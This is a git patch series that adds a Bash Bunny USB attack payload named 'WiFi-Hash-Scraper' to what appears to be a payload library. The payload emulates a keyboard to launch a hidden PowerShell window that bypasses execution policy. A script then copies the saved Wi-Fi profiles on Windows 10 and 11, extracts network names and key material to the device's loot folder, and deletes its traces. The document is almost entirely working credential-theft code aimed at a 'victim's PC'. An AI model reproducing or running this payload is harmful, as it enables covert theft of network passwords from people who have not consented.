From b0ebf99aad541ee2a0b83e015bf73f97d229796f Mon Sep 17 00:00:00 2001 From: KryptoKola <119087357+KryptoKola@users.noreply.github.com> Date: Tue, 27 Dec 2022 02:50:50 -0500 Subject: [PATCH 1/4] Create payload.txt --- .../recon/WiFi-Hash-Scraper/payload.txt | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 payloads/library/recon/WiFi-Hash-Scraper/payload.txt diff --git a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt new file mode 100644 index 00000000..227ee717 --- /dev/null +++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt @@ -0,0 +1,22 @@ +#!/bin/bash +# +# Title: Wi-Fi Hash Scraper +# +# Description: +# Copies all of the known / saved WiFi password hashes from the victim's PC to the BashBunny's loot folder. +# +# Author: KryptoKola +# Version: 1.0 +# Category: Recon +# Target: Microsoft Windows 10 & 11 + +ATTACKMODE HID STORAGE + +LED SETUP +GET SWITCH_POSITION +LED ATTACK +RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')" +Q DELAY 250 +Q ENTER +Q DELAY 3000 +LED FINISH From 9eda9728d0925275f8ee39c8b11ae15f79f998d2 Mon Sep 17 00:00:00 2001 From: KryptoKola <119087357+KryptoKola@users.noreply.github.com> Date: Tue, 27 Dec 2022 02:55:30 -0500 Subject: [PATCH 2/4] Get-Hashes Script --- .../recon/WiFi-Hash-Scraper/Get-Hashes.ps1 | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1 diff --git a/payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1 b/payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1 new file mode 100644 index 00000000..1f56aaf5 --- /dev/null +++ b/payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1 @@ -0,0 +1,22 @@ +#Wi-Fi Information Scraper +cd "~"; +$tDate = Get-Date -Format "MM-dd-yyyy"; +$vol = Get-Volume -FileSystemLabel BashBunny; +$baseDir = $vol.DriveLetter + ":/loot/WiFi-Hash-Scraper/" + $tDate; +$interfaceDir = $baseDir + "/Interfaces"; +$oFile = $baseDir + "/WiFi-Info.txt"; +Copy-Item "C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces" "$interfaceDir" -R -Force; +cd $interfaceDir; +$temp = Get-ChildItem | Select-String "{"; +$interfaces = $temp -split "[Environment]::NewLine"; +foreach($iface in $interfaces){ + cd $iface; + $ftemp = Get-ChildItem; + $files = $ftemp -split "[Environment]::NewLine"; + foreach($sNet in $files){ + $temp = cat "$sNet" | Select-String "name";$temp += "";$temp += cat $sNet | Select-String "keyMaterial";echo $temp | Out-File $oFile -Append + } + cd ../; +} +cd "~"; +Remove-Item $interfaceDir -R; \ No newline at end of file From 0189ae0fa886fe48b425eacb1df17d8a34b530ec Mon Sep 17 00:00:00 2001 From: KryptoKola <119087357+KryptoKola@users.noreply.github.com> Date: Thu, 29 Dec 2022 21:48:23 -0500 Subject: [PATCH 3/4] Changed "BashBunny" to "${BB_LABEL}" --- payloads/library/recon/WiFi-Hash-Scraper/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt index 227ee717..f08e2141 100644 --- a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt +++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt @@ -15,7 +15,7 @@ ATTACKMODE HID STORAGE LED SETUP GET SWITCH_POSITION LED ATTACK -RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')" +RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel '${BB_LABEL}').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')" Q DELAY 250 Q ENTER Q DELAY 3000 From 91da428d0823b752c47c39fe1886d6623d4fec22 Mon Sep 17 00:00:00 2001 From: KryptoKola <119087357+KryptoKola@users.noreply.github.com> Date: Mon, 2 Jan 2023 19:20:57 -0500 Subject: [PATCH 4/4] Updated Setup to include GET BB_LABEL Updated Setup to include GET BB_LABEL --- payloads/library/recon/WiFi-Hash-Scraper/payload.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt index f08e2141..f32b91d5 100644 --- a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt +++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt @@ -11,6 +11,7 @@ # Target: Microsoft Windows 10 & 11 ATTACKMODE HID STORAGE +GET BB_LABEL LED SETUP GET SWITCH_POSITION